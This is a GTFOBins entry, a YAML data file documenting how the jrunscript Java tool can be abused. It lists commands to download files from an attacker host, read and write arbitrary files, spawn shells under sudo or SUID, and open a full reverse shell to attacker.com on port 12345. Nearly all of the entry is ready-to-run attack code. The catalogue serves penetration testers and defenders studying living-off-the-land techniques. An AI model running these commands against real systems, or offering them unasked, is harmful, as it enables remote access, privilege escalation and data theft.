GTFOBins.github.io/_gtfobins/jrunscript

---
comment: |-
  This tool is installed starting with Java SE 6.
functions:
  download:
  - code: |-
      jrunscript -e 'cp("http://attacker.com/path/to/input-file","/path/to/output-file")'
    contexts:
      sudo:
      unprivileged:
    sender: http-server
  file-read:
  - binary: false
    code: |-
      jrunscript -e 'br = new BufferedReader(new java.io.FileReader("/path/to/input-file"));
          while ((line = br.readLine()) != null) { print(line); }'
    contexts:
      sudo:
      unprivileged:
  file-write:
  - code: |-
      jrunscript -e 'var fw=new java.io.FileWriter("/path/to/output-file");
          fw.write("DATA");
          fw.close();'
    contexts:
      sudo:
      unprivileged:
  reverse-shell:
  - code: |-
      jrunscript -e 'var host="attacker.com";
          var port=12345;
          var p=new java.lang.ProcessBuilder("/bin/sh", "-i").redirectErrorStream(true).start();
          var s=new java.net.Socket(host,port);
          var pi=p.getInputStream(),pe=p.getErrorStream(),si=s.getInputStream();
          var po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){
          while(pi.available()>0)so.write(pi.read());
          while(pe.available()>0)so.write(pe.read());
          while(si.available()>0)po.write(si.read());
          so.flush();po.flush();
          java.lang.Thread.sleep(50);
          try {p.exitValue();break;}catch (e){}};p.destroy();s.close();'
    contexts:
      sudo:
      unprivileged:
    listener: tcp-server
  shell:
  - code: |-
      jrunscript -e 'exec("/bin/sh -c $@|sh _ echo sh </dev/tty >/dev/tty 2>/dev/tty")'
    contexts:
      sudo:
      suid:
        code: |-
          jrunscript -e 'exec("/bin/sh -pc $@|sh${IFS}-p _ echo sh -p </dev/tty >/dev/tty 2>/dev/tty")'
        comment: |-
          This has been found working in macOS but failing on Linux systems.
        shell: false
      unprivileged:
...